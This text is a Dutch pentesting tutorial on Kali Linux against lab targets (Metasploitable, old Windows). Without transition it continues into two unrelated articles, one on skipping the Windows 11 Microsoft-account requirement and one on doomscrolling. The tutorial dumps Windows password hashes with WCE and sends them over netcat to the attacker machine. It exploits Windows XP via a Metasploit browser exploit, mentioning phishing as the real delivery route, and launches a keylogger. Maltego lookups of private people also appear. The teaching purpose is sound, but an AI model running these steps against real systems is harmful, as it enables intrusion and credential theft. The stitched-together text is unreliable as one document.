Je hebt een (thuis)netwerk en wilt hackers een stap voor blijven. Zelf in de huid van een hacker kruipen en je eigen netwerk, systemen en servers aanvallen is een uitstekende manier om kwetsbaarheden bloot te leggen, zodat je gerichte maatregelen kunt nemen. Deze vorm van ethisch hacken noemen we pentesting. In dit artikel gaan we aan de slag met enkele knappe tools, waaronder Kali Linux.

Pentesting, kort voor penetration testing, wordt wel vaker verward met een kwetsbaarheidsscan (vulnerability scan). Maar terwijl zo’n kwetsbaarheidsscan it-systemen via een geautomatiseerde procedure op zwakheden controleert en zich dus tot bekende beveiligingsfouten beperkt, gaat een pentester doorgaans verder. Met behulp van allerlei tools en creatieve aanvalstechnieken zoekt die geautomatiseerd en handmatig naar een zo breed mogelijke waaier aan kwetsbaarheden.

In dit artikel gaan we zelf met pentesting aan de slag. Daartoe maken we gebruik van Kali Linux. Deze distro bevat honderden pentesting-applicaties voor onder meer inventarisatie en enumeratie, sniffing en spoofing, wifi-aanvallen, kwetsbaarheidsanalyses, social engineering en het kraken van wachtwoorden. In deze masterclass moeten we ons noodzakelijkerwijs tot een handvol tools beperken.

Kali Linux is voor diverse platformen beschikbaar en laat zich zowel bare metal, dual boot, op een live medium als virtueel installeren. Wij kiezen voor de laatste methode en maken daarvoor gebruik van Oracle VM VirtualBox.

01 Kali-installatie

Download en installeer alvast VirtualBox. Start de tool op en kies Bestand / Voorkeuren / Netwerk. Druk op de knop Voeg NAT-netwerk toe en dubbelklik op het toegevoegde item. Eventueel pas je Netwerknaam en Netwerk CIDR (10.0.2.0/24) aan, maar zorg wel dat Inschakelen netwerk is aangevinkt. Bevestig met OK (2x).

Dan is het nu tijd om Kali Linux te virtualiseren. Ga naar de site van Kali Linux, open het tabblad Kali Linux VirtualBox Images en haal Kali Linux Vbox 64 bit Ova op. Die installeer je als volgt in VirtualBox: kies Bestand / Appliance importeren, verwijs naar je download en klik op Volgende. Dubbelklik eventueel op de naam als je die wilt wijzigen en start de operatie met Importeren. Na afloop start je de virtuele machine op. Je meldt je aan met root (gebruikersnaam), toor (wachtwoord). Even later duikt de Kali-desktop op: in het Applications-menu tref je al talrijke pentesting-tools aan. Mocht Kali niet willen opstarten, klik dan met rechts op je Kali-machine en kies Instellingen / USB: ga na of de optie USB 1.1 (OHCI) Controller wel is geselecteerd. Nu hoort het wél te lukken.

©PXimport

02 Kali-update

Je hebt dan wel een NAT-netwerk toegevoegd, maar je moet er ook voor zorgen dat Kali en naderhand ook de targets ditzelfde netwerk gebruiken. Zorg dat Kali is afgesloten en rechtsklik op het Kali-pictogram in de beheermodule van VirtualBox. Kies Instellingen / Netwerk en kies bij Gekoppeld aan de optie NAT-netwerk. In het uitklapmenu bij Naam vind je het betreffende netwerk terug. Je mag nu Kali (weer) opstarten, waarna we de distro eerst gaan updaten. Start de desktop op en klik op het icoon Terminal, waarna je de volgende opdracht uitvoert:

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Hiermee start je een langdurige procedure die heel af en toe om een bevestiging vraagt en die je maar beter niet onderbreekt.

©PXimport

03 Target-installaties

Het lijkt ons niet zo veilig om onze pentesting-experimenten meteen maar in een productie-omgeving uit te voeren. Liever gebruiken we enkele eveneens gevirtualiseerde targets. Een voor de hand liggend slachtoffer is alvast Metasploitable, een Ubuntu-distributie die opzettelijk van talrijke kwetsbaarheden is voorzien, precies met het oog op pentesting. Je downloadt die op Sourceforge. Pak het zip-bestand uit, start VirtualBox, klik op Nieuw, vul bij Type Linux en bij Versie Ubuntu (64-bit) in. 1 GB ram-geheugen kan volstaan. Selecteer Gebruik een bestaand virtuele harde schijf bestand en verwijs naar het uitgepakte vmdk-bestand. Bevestig met Aanmaken. Start het systeem op en log in met msfadmin, zowel voor de gebruikersnaam als het wachtwoord, en controleer of je wel met de juiste toetsenbordindeling werkt.

Laten we ook een paar (oudere) Windows-versies installeren. Voor Windows 7 en 10 kun je voor ova-appliances op de site van Microsoft terecht (bij Select platform kies je VirtualBox). Windows XP (SP3) kun je nog vinden op www.softlay.net, waar je Windows / Windows XP ISO selecteert. Omdat we deze targets zoveel mogelijk onbeschermd willen laten, kun je de automatische updatefunctie van Windows het best uitschakelen.

©PXimport

Extern

04 Snelle scan

Zoals gezegd bevat Kali vele tientallen pentesting-tools, verdeeld in uiteenlopende rubrieken als Vulnerability Analysis, Web Application Analysis, Password Attacks, Exploitation Tools en Information Gathering. We beginnen ons experiment met de laatste: een van de eerste stappen die ook een hacker zal zetten.

We starten met een eenvoudige opdrachtregeltool: dmitry. Die vind je via Applications / Information Gathering / dmitry. In zijn eenvoudigste vorm hoef je slechts een domeinnaam op te geven (bijvoorbeeld dmitry computertotaal.nl). Dat levert al heel wat informatie op, waaronder ip-adres, nameservers, subdomeinen, registrar, enz. Het wordt al wat spannender als je je Metasploitable-installatie analyseert. Uiteraard moet dat systeem dan wel actief zijn: via het commando ifconfig kom je het ip-adres van je Metasploitable (eth0) te weten, waarna je vanuit Kali deze opdracht kunt uitvoeren:

dmitry <ip-adres-metasploitable> -pb

De parameter -pb zorgt voor een poortscan, inclusief de banners van de gebruikte software.

©PXimport

05 Transformatieconcept

Een informatietool van een geheel andere orde is (de gratis community edition van) Maltego. Die maakt handig gebruik van publiek beschikbare bronnen om allerlei informatie over organisaties of personen op te vissen. Je dient je wel eerst bij Maltego te registreren. Daarna ga je naar Applications / Information gathering / Maltego en klik je bij Matego CE (Free) op Run. Meld je bij de dienst aan en bevestig met Next (3x) en met Finish.

In het Transform Hub-venster tref je een reeks zogenoemde transforms aan: dat zijn processen die publieke data over het beoogde doelwit kunnen opvragen en deze data vervolgens naar een overzichtelijke informatiestructuur transformeren. De transform PATERVA CTAS CE is standaard al geïnstalleerd. Er zijn nog heel wat andere transforms die je kunt installeren, zoals Kaspersky Lab, VirusTotal Public API, Have I Been Pwned? enzovoort. De meeste vergen wel een token of API-sleutel, aan te vragen bij de respectieve producenten.

©PXimport

06 Transformatiegrafieken

Aan de slag nu. Klik linksboven op het plusknopje Create a new graph: in het linkerpaneel verschijnt een reeks functies, zoals Infrastructure, Penetration Testing, Malware, Personal enzovoort. We beperken ons hier tot twee voorbeelden.

Zo vind je in de rubriek Infrastructure de Domain-functie terug: sleep die naar het nog lege canvas, dubbelklik hierop en vul de domeinnaam in die je wilt onderzoeken. Rechtsklik vervolgens op dit item en kies (bijvoorbeeld) DNS from Domain / Run All om de bijbehorende transforms uit te voeren. Het resultaat is een (ook grafisch) overzicht van zowat alle sites en servers die met dit domein te maken hebben. Rechtsklik op een subitem voor nog meer gedetailleerde informatie.

Ook over personen kun je informatie opvragen. Open de rubriek Personal en sleep Person naar het canvas. Dubbelklik om hier zelf een persoonsnaam in te kunnen tikken en laat er desgewenst alle transforms op los. Voor Twitter moet je wel eerst nog je toestemming verlenen. Vervolgens druk je op de knop Run!; je hoeft hier niet per se specifieke domeinen in te vullen. Als het goed is duiken even later telefoonnummers, adressen, websites enzovoort op die met die persoon verband houden. Ook hier kun je rechtsklikken op subitems om nog dieper te kunnen graven naar bruikbare informatie.

©PXimport

07 Nikto: snelle scan

Niet alleen informatierondes, maar ook kwetsbaarheidsanalyses vormen een essentieel onderdeel van het takenpakket van een pentester. Ook op dit vlak stelt Kali allesbehalve teleur. We beperken ons in deze masterclass noodgedwongen tot twee tools uit dit arsenaal.

De eerste is Nikto, waarmee je verschillende webservers zoals de populaire Apache en Nginx op zo’n 7000 kwetsbaarheiden kunt scannen.

De Metasploitable-installatie vormt alvast een uitstekend doelwit voor Nikto. Start het systeem op in VirtualBox en ga via ifconfig na wat het interne ip-adres is. Vervolgens start je Nikto op via Applications / Vulnerability Analysis / nikto en voer je dit opdrachtregelcommando uit:

nikto -h <ip-adres-metasploitable>

Het resultaat volgt vrijwel onmiddellijk: in Metasploitable blijkt standaard een (verouderde) Apache-server actief (Apache/2.2.8 (Ubuntu)) en Nikto somt dan ook maar meteen een aantal mogelijke exploits op, zoals “The anti-clickjacking X-Frame-Options header is not present” en “The X-XSS-Protection header is not defined”. Even googelen brengt je al een heel eind op weg om zulke kwetsbaarheden te exploiteren of op te lossen. Je kunt hiervoor onder meer terecht op deze website.

©PXimport

08 OpenVAS installeren

Een andere kwetsbaarheidsscanner is OpenVAS oftewel Opensource Vulnerability Assessment System. Jammer genoeg is deze tool standaard niet in Kali geïnstalleerd, maar dat breng je snel in orde met het opdrachtregelcommando:

apt-get update && apt-get install -y openvas

Zodra deze operatie achter de rug is, voer je het commando openvas-setup uit. Deze setup kan een hele poos duren, want er worden enkele tienduizenden kwetsbaarheidstests gedownload, ook wel nvt’s of network vulnerability tests genoemd.

Aan het einde van de rit geeft OpenVAS je een uiterst complex wachtwoord, maar dat laat zich gelukkig aanpassen met het commando:

openvasmd --user=admin --new-password=<nieuw_wachtwoord>

Vervolgens voer je ook het commando greenbone-nvt-sync uit, zodat de lokale nvt’s via een feedservice up-to-date worden gehouden.

Met openvas-start zet je OpenVAS in gang. De standaardbrowser Firefox ESR verbind je met de webinterface van OpenVAS (https://127.0.0.1:9392). De browser klaagt weliswaar over een onveilige verbinding, maar dat stuur je bij via Advanced / Add Exception / Confirm Security Exception. Normaliter hoor je je nu wel te kunnen aanmelden met admin en het zojuist aangepaste wachtwoord.

©PXimport

09 OpenVAS uitvoeren

Vanuit het OpenVAS-dashboard kun je meteen een scan uit laten voeren, en waarom niet op onze Metasploitable-machine?

Open het menu Scans / Tasks, klik linksboven op het toverstokpictogram en kies Task Wizard, waarna je het ip-adres van je Metasploitable-systeem invult. Je begint het scanproces met Start scan. Het controleren van enkele tienduizenden potentiële kwetsbaarheden blijkt een werk van lange adem. Standaard ververst je browser elke 30 seconden het beeld (zie rechtsboven: Refresh every 30 Sec.). Duikt een foutmelding op, dan krijg je de scan met Ctrl+R wel weer op de rails.

Na afloop van de scanronde klik je het cijfer in de kolom Reports aan: je verneemt nu hoeveel kwetsbaarheden er zijn aangetroffen en hoe ernstig die ingeschat worden.

Op ons Metasploitable-toestel bleek het te gaan om 56 kwetsbaarheden, waarvan 3 Low, 36 Medium en 17 High. Voor een uitvoerig rapport klik je op de datum in de Date-kolom. Elke kwetsbaarheid wordt dan omschreven en je krijgt het getroffen poortnummer (Location) en een QoD-indicatie (Quality of Detection) te zien om de betrouwbaarheid van de detectie aan te geven. Nuttig is ook de kolom Solution type, met indicaties als VendorFix, Workaround, Mitigation (inperking) of in het slechtste geval WillNotFix. Je hoeft zo’n kwetsbaarheid maar aan te klikken om uitgebreide feedback te krijgen. Zo’n rapport laat zich trouwens ook naar diverse formaten exporteren, waaronder csv, html en pdf.

©PXimport

10 Wachtwoordgeneratoren

Het zal je weinig verbazen dat pentesters niet vies zijn van een potje wachtwoordkraken. Dat kan met ‘brute force’ (alle mogelijke combinaties uitproberen), op basis van een woordenboek (met potentiële wachtwoorden) of met behulp van ‘rainbow tables’ (lijsten met mogelijke hashes – dat is de vorm waarin wachtwoorden vaak door een systeem worden bewaard – in combinatie met de bijbehorende wachtwoorden).

In de rubriek Password Attacks vind je alvast een heel arsenaal. Zo tref je in de subrubriek Password Profiling & Wordlists bijvoorbeeld de wachtwoordgenerator Cewl aan. Die vist automatisch potentiële wachtwoorden op uit een website, evenals gebruikersnamen uit e-mailadressen: die komen van pas bij social engineering. Dat testen we opnieuw even uit op de Metasploitable-machine met een opdrachtregelcommando als:

cewl <ip-adres-metasploitable> -w cewlwoorden.txt -d 4

Hiermee extraheer je alle kandidaat-wachtwoorden tot vier linkniveaus diep, waarna die automatisch in het tekstbestand cewlwoorden.txt worden opgeslagen. Dit proces is behoorlijk arbeidsintensief, maar het laat zich altijd nog onderbreken met Ctrl+C. Je kunt het resultaat vervolgens bekijken met een opdracht als nano cewlwoorden.txt.

©PXimport

11 Wachtwoorden kraken

De populaire wachtwoordkraker John The Ripper, die zelfs overweg kan met Windows-hashes, ontbreekt evenmin in Kali. We tonen even hoe je via een remote sessie de accountwachtwoorden achterhaalt op je Windows XP-systeem. We gaan wel uit van het scenario waarbij je als aanvaller via een exploit intussen al shell-access hebt tot die machine – dit scenario komt trouwens verder in deze masterclass nog aan bod. Door middel van deze shell-access heb je intussen ook al twee portable programma’s op de XP-machine gezet: Netcat en Windows Credentials Editor. Dit laatste voer je (zo nodig remote) uit met het commando wce -l -o windowshashes.txt: dit commando zorgt ervoor dat de Windows-hashes in het tekstbestand windowshashes.txt terechtkomen.

De bedoeling is nu dat we dit tekstbestand via een netcat-sessie overbrengen naar de Kali-machine. Open daartoe een nieuw Terminal-venster in Kali en start een luistersessie op bijvoorbeeld poort 1111 met nc -l -p 1111 >windowshashes.txt. Op de Windows XP-machine voer je deze opdracht uit:

nc -w 3 <ip-adres-Kali-machine> 1111 <windowshashes.txt

En dan nu over naar de gui-interface van John the Ripper: ga naar Applications / Password attacks / Johnny. Hier klik je op Open password file, kies je (PASSWD format) en haal je windowshashes.txt in de rootmap op.

©PXimport

Arsenaal

©PXimport

12 Windows-exploitatie

Kali beschikt ook over krachtig gereedschap om remote root access te verkrijgen, waaronder het Metasploit-framework en de bijbehorende gui Armitage. We tonen je hoe je zoiets voor elkaar krijgt op de Windows XP-machine.

Open Applications / Exploitation tools / armitage en klik op Connect en op Yes om verbinding te maken met het Metasploit-framework. Armitage start op en we willen hier

een exploit selecteren waarvan we weten dat die via een (verouderde) browser op een XP-toestel kan worden uitgevoerd. Klik op exploit / windows / browser en dubbelklik op ms14_064_ole_code_execution. Bevestig met Launch.

Onderaan lees je het Local IP af. Je moet de gebruiker van de XP-machine zover krijgen dat die dat adres in zijn browser intikt. In werkelijkheid gebeurt zoiets wellicht via phishing, maar hier tikken we het gewoon zelf in de XP-browser in. Ogenschijnlijk gebeurt er niets, maar terug bij je Kali-machine zie je dat de gecompromitteerde XP-machine al is toegevoegd. Rechtsklik op de bijbehorende miniatuurweergave en kies Meterpreter 1 / Interact / Meterpreter Shell. Onderaan verschijnt nu de prompt meterpreter >. Het commando help geeft je meer uitleg. Je kunt van hieruit nu allerlei commando’s op je XP-machine uitvoeren, zoals cd\, ls, ps enzovoort.

Ga ook even na wat er gebeurt als je Meterpreter 1 / Explorer / Log Keystrokes opstart: wanneer je op Launch klikt, lanceer je een keylogger op de XP-machine die alle toetsaanslagen opslaat in het vermelde txt-bestand. We zeiden het al: met roottoegang wordt zowat alles mogelijk!

©PXimport

Wanneer je Windows 11 (opnieuw) installeert, vereist Microsoft dat je je aanmeldt met een Microsoft-account of dat je er eentje aanmaakt. En dat terwijl je je voorheen in Windows 10 gewoon met een offline account kunt aanmelden. Wij laten je zien hoe je dat ook in Windows 11 doet, rechtstreeks tijdens de installatieprocedure.

Microsoft wil maar al te graag dat je een Microsoft-account hebt en deze ook gebruikt bij het aanmelden van Windows 11. Behalve dat je hiermee in geval van het vergeten van je installatiecode het besturingssysteem makkelijker opnieuw kunt activeren, biedt een Microsoft-account niet heel veel extra voordelen in Windows 11 zelf. Het enige wat met zo'n account makkelijker gaat is het instellen van e-mail en OneDrive, maar dat zijn ook diensten waar je je later bij kunt aanmelden.

Installatieprocedure

In een van de laatste stappen van de installatieprocedure, of wanneer je een Windows 11-laptop hebt gekocht, word je - om de laatste instellingen toe te passen - gevraagd om in te loggen bij een Microsoft-account, of er eentje aan te maken.

©MG | ID.nl

Wanneer je in bovenstaand scherm bent aangekomen, lijkt het alsof je hier niet meer uit kunt komen: je moet óf een account invullen, óf er eentje aanmaken, óf een stap terug gaan met de pijl rechtsboven in beeld. Toch kun je hier nog iets anders doen, namelijk een opdrachtprompt openen. En dat is handig, want met een opdrachtprompt tijdens de installatie van Windows 11 kun je alvast dingen regelen voordat Windows 11 zelf is opgestart. Het omzeilen van het aanmaken of invoeren van een Microsoft-account bijvoorbeeld. Om de opdrachtprompt te openen, moet je de volgende toetscombinatie intypen:

Shift+F10

Let op: bij sommige computers zoals laptops kan het zijn dat je ook de Functietoets Fn moet indrukken om de F10-knop te kunnen gebruiken. De opdracht wordt in dat geval dan:

Shift+Fn+F10

Na het indrukken van deze toetscombinatie wordt een zwart venster voor de opdrachtprompt geopend.

©MG | ID.nl

In dit scherm voor je een speciale opdracht in waarmee we de verplichte invoer voor een Microsoft-account gaan omzeilen. Zodra Windows 11 heeft gedetecteerd dat jouw computer een werkende verbinding heeft, blijf je op dat accountscherm hangen, maar ook wanneer er nog geen verbinding is gemaakt, wil Microsoft toch eerst dat je verbinding maakt en daarna alsnog met een Microsoft-account aan de slag gaat.

Nu de opdrachtprompt is geopend, schakelen we die online functie uit. Voer exact de volgende opdracht in:

start ms-cxh:localonly

Gevolgd door een druk op de Enter-toets. Dat zit eruit als hieronder:

©MG | ID.nl

Nadat je op Enter hebt gedrukt, verschijnt er een nieuw venster met de mogelijkheid om een lokaal account (dus zonder Microsoft-account) aan te maken. Goed om te weten: dit account is ook meteen een administrator-account.

©MG | ID.nl

Je kunt hier dus gewoon een normale (voor- en achter)naam opgeven, een e-mailadres is dan niet nodig. Je kunt ervoor kiezen om nu een wachtwoord in te vullen, maar als je dat doet, krijg je ook direct drie controlevragen die je moet opgeven; dat kun je niet skippen. Sla je het aanmaken van een wachtwoord nu over, dan kun je dat later in Windows 11 alsnog doen.

Nadat je de benodigde gegevens hebt ingevuld, worden de laatste installatiestappen voltooid, en wordt de computer nog een keertje opnieuw opgestart. Daarna kun je je aanmelden met het nieuwe account en voer je nog een aantal stappen uit met betrekking tot functies als locatie, diagnostische gegevens en handschriftherkenning.

Account aanpassen

Het account waarmee je je aanmeldt is een administrator-account. In dat geval doe je er goed aan om een wachtwoord in te stellen als je dat nog niet hebt gedaan in de hierboven uitgelegde stap. Om een wachtwoord in te stellen, klik je op de Startknop, en vervolgens op je accountnaam en kies je voor Mijn account beheren.

©MG | ID.nl

Je komt nu in het instellingenscherm terecht voor je account. Scroll naar de knop Aanmeldingsopties en daarna op Wachtwoord.

©MG | ID.nl

Nu kun je een wachtwoord naar wens opgeven, de eisen zijn hier niet streng, maar uiteraard kies je wel voor een lastig te raden wachtwoord. Wel ben je verplicht om een geheugensteuntje op te geven, maar dat is minder lastig dan drie extra beveiligingsvragen die je normaliter bij het installatiescherm moet opgeven. Bij de geheugensteun mag het wachtwoord (vanzelfsprekend) niet gebruikt worden .

©MG | ID.nl

Wachtwoord en geheugensteun ingevoerd? Dan ben je in principe klaar en kun je je systeem verder gaan configureren. Eventueel kun je nu ook nieuwe extra accounts aanmaken via het onderdeel Andere gebruikers in het instellingenscherm.

Je pakt je telefoon om even snel iets te bekijken – en ineens ben je zomaar een uur verder, omdat je niet kon stoppen met scrollen. En onderweg ben je meestal niet blijven hangen bij blije kattenfilmpjes, maar bij rampen, slecht nieuws en roddel. Of bij posts van mensen die allemaal mooier of rijker lijken dan jij. Doomscrolling dus. Slecht voor je humeur en zelfbeeld én zonde van je tijd. Maar gelukkig kun je er iets tegen doen.

Lees ook: Minder afleiding van je telefoon met deze 6 apps

Wat is doomscrolling?

Doomscrolling is eindeloos blijven scrollen door berichten, filmpjes en posts die je eigenlijk alleen maar onrustig maken. Dat begon ooit met nieuws, maar geldt tegenwoordig ook voor sociale media. Denk aan TikTok, Instagram of X waar je urenlang blijft scrollen, maar waar je zelden wijzer of rustiger van wordt. Het algoritme weet precies wat je aandacht trekt – en hoe het je blijft vasthouden.

De term ontstond rond 2020, tijdens de COVID-19-pandemie, toen mensen massaal thuis zaten en constant updates zochten over het virus. Maar het fenomeen heeft zich sindsdien uitgebreid naar alle vormen van nieuws of posts waar je je slechter van gaat voelen.

Waarom blijven we scrollen?

Apps zijn zo ontworpen dat ze je aandacht vasthouden. Elke swipe of nieuwe video geeft een kleine prikkel in je brein: een signaal dat er misschien iets interessants komt. Soms zit er iets tussen dat écht boeit, maar vaak blijft het bij vluchtige prikkels. Ondertussen raakt je hoofd vol, maar je krijgt er weinig voor terug.

Hoe weet je of je doomscrollt?

Er bestaat geen test waarmee je kunt checken of je een doemscroller bent. Maar er zijn wel duidelijke signalen. Je zit in de gevarenzone wanneer je:

🚩 Gedachteloos nieuws- of socialmedia-apps opent, vaak meerdere keren per dag
🚩 Je daarna leeg, onrustig of somber voelt
🚩 Moeite hebt om te stoppen, terwijl je eigenlijk wel weet dat het nergens toe leidt
🚩 's Avonds of 's ochtends lang op je telefoon zit zonder duidelijk doel
🚩 Niet toekomt aan andere dingen, of je gejaagd voelt als je niets checkt

Herkenbaar? Dan is het tijd om je scrollgedrag te doorbreken. Dat is niet makkelijk, maar het kan wel. Onderstaande tips helpen je op weg.

©Gorodenkoff

Wat kun je doen tegen doomscrolling?

1. Beperk je schermtijd en las schermvrije tijdstippen in

Geef jezelf vaste momenten waarop je iets mag checken. Bijvoorbeeld: 's ochtends 15 minuten nieuws, 's avonds 10 minuten social media. Stel een timer in, zodat je niet ongemerkt blijft hangen. Je kunt ook met jezelf afspreken dat je bijvoorbeeld één uur per dag niet op je scherm kijkt. Of in het weekend pas na twaalf uur 's middags je telefoon pakt. Ook is het mogelijk om tijdslimieten in te stellen voor bepaalde apps. Hieronder lees je hoe je dat doet op een iPhone en op een Android-toestel.

Scherm- en apptijd beperken op iPhone

Wil je op vaste tijden niet gestoord worden? Stel dan apparaatvrije tijd in op je iPhone. Tijdens die periodes zijn alleen telefoongesprekken, berichten en apps die je zelf toestaat beschikbaar. Ga naar Instellingen > Schermtijd, tik op App- en websiteactiviteit en schakel dit in als dat nog niet gebeurd is. Kies daarna voor Apparaatvrije tijd en stel via Gepland de begin- en eindtijd in. Je kunt kiezen voor elke dag hetzelfde tijdstip of per dag variëren. Vlak voor de ingestelde tijd krijg je een herinnering.

Ook kun je tijdslimieten instellen voor apps of hele categorieën, zoals sociale netwerken of games. Ga naar Instellingen > Schermtijd > Applimieten > Voeg limiet toe en selecteer de gewenste apps of categorieën. Tik op Volgende, stel de limiet in en gebruik eventueel Pas dagen aan voor verschillende limieten per dag. Rond af met Voeg toe.

Scherm- en apptijd beperken op je Android-telefoon

Rustmomenten op je Android-toestel stel je in via de Bedtijdmodus. Tijdens deze periodes worden je schermkleuren aangepast (bijvoorbeeld naar grijstinten) en kun je meldingen dempen of het scherm automatisch laten uitschakelen. Ga naar Instellingen > Digitaal welzijn en ouderlijk toezicht > Bedtijdmodus en stel in wanneer de modus moet starten en eindigen. Je kunt dit voor elke dag apart instellen of een vast schema kiezen.

Wil je appgebruik beperken? Ga dan naar Digitaal welzijn > Dashboard en kies de app die je wilt beperken. Tik op het zandlopertje naast de app en stel een dagelijkse limiet in. Zodra de limiet is bereikt, is de app de rest van die dag niet meer toegankelijk.

2. Zet meldingen uit

Pushmeldingen van nieuwsapps, sociale media of video-apps zorgen dat je telkens toch weer gaat kijken en scrollen. Zet ze uit. Wat je niet ziet, open je ook minder snel.

3. Richt je telefoon prikkelarmer in

Zet socialmedia- en nieuwsapps niet op je beginscherm. Of verwijder ze helemaal. Wil je ze toch echt bezoeken, dan kan dat via de browser. Dat is een extra handeling vergeleken met een app, maar juist daarom doe je het misschien minder vaak.  

Verder kun je er ook voor kiezen om de grijstintenmodus in te schakelen. Dat zorgt voor minder afleiding en een beeld dat rustiger is.

Op een iPhone ga je hiervoor naar Instellingen > Toegankelijkheid > Weergave en tekstgrootte > Kleurfilters en schakel je de optie in. Op een Android-smartphone ga je hiervoor naar Instellingen -> Toegankelijkheid -> Kleurfilters. Hier schakel je de optie Grijstinten in. Afhankelijk van je toestel kunnen deze menu-opties een iets andere naam hebben.

©ID.nl

4. Volg niet alles en iedereen

Kies één of twee betrouwbare nieuwsbronnen. Ontvolg accounts die vooral onrust of negativiteit brengen. Kies liever voor mensen of media die je inspireren, informeren of aan het denken zetten. Een account waar je geen energie van krijgt, maar dat je energie kost: dat kun je beter ontvolgen.

Stoppen met doom-scrolling? Het kan!

Doomscrolling gaat allang niet meer alleen over nieuws. Ook gedachteloos scrollen langs filmpjes, reacties of meningen op sociale media hoort erbij. Het lijkt onschuldig, maar kost tijd, energie en aandacht — en levert weinig op.

Het goede nieuws: je kunt ermee stoppen. Niet in één keer, maar stap voor stap. Door bewuster te kiezen wat je leest en wanneer. Door je telefoon minder het ritme van je dag te laten bepalen. En door ruimte te maken voor dingen die je echt iets opleveren.